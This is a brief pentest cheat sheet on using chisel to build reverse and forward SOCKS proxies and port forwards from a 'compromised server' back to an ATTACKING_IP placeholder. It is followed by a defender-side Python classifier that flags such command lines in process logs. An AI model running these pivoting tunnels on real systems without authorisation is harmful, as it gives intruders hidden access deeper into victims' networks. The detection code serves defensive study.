chisel

  • can be used to set up a tunneled proxy or port forward

  • doesn't require ssh

  • copy the files from GitHub and extract with gunzip *

  • there must be an appropriate copy of the chisel binary on both the attacking machine and compromised server

  • Reverse Socks Proxy

    • set up a listener on your chosen port

      • ./chisel server -p LISTEN_PORT --reverse &

    • on the compromised host do:

      • ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

  • Forward Socks

    • rarer than reverse proxies

    • on the compromised host use:

      • ./chisel server -p LISTEN_PORT --socks5

    • on the attacking box

      • ./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

  • Remote Port Forward

    • for when we connect back from a compromised target to create the forward

    • on the attacking machine

      • ./chisel server -p LISTEN_PORT --reverse &

    • from the compromised server

      • ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

  • Local Port Forward

    • on the compromised server

      • ./chisel server -p LISTEN_PORT

    • on the attacking machine

      • ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
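
Defender-side view of the four setups above, as an added example that is not part of the original notes: a small Python classifier that labels process command lines by the chisel tunnel type their arguments describe, without relying on the binary's name. The function names, labels and sample command lines are constructed for illustration.

```python
import re
import shlex

# Remote-spec shapes used by the commands above (R: prefix = reverse direction).
SOCKS = re.compile(r"^(R:)?(\d{1,5}:)?socks$")
FORWARD = re.compile(r"^(R:)?\d{1,5}:[A-Za-z0-9.\-]+:\d{1,5}$")


def classify(cmdline):
    """Label a process command line by chisel tunnel type, or return None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a logged command line
        return None
    # Key on the argument shape, not argv[0]: the binary is easily renamed.
    modes = [i for i, a in enumerate(argv[1:], 1) if a in ("server", "client")]
    if not modes:
        return None
    mode, rest = argv[modes[0]], argv[modes[0] + 1:]
    if mode == "server":
        if "-p" not in rest:
            return None
        if "--reverse" in rest:
            return "reverse-listener"
        # "plain-server" is low confidence on its own: other tools share this shape.
        return "socks5-server" if "--socks5" in rest else "plain-server"
    for arg in rest:
        if SOCKS.match(arg):
            return "reverse-socks" if arg.startswith("R:") else "forward-socks"
        if FORWARD.match(arg):
            return "remote-port-forward" if arg.startswith("R:") else "local-port-forward"
    return None


# Constructed sample command lines, as they might appear in process-creation logs.
SAMPLES = [
    "./chisel server -p 1337 --reverse",
    "/tmp/.cache/upd client 10.50.0.9:1337 R:socks",
    "./chisel server -p 8080 --socks5",
    "./chisel client 10.200.0.20:8080 9090:socks",
    "./c client 10.50.0.9:1337 R:2222:172.16.0.10:22",
    "./chisel client 10.200.0.20:8080 2222:172.16.0.10:22",
    "ssh -L 2222:172.16.0.10:22 user@10.200.0.20",  # benign, must not match
]


def scan(lines):
    """Return (label, line) for every line that classifies as a tunnel."""
    return [(classify(line), line) for line in lines if classify(line)]


if __name__ == "__main__":
    for label, line in scan(SAMPLES):
        print(f"{label:20} {line}")
```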
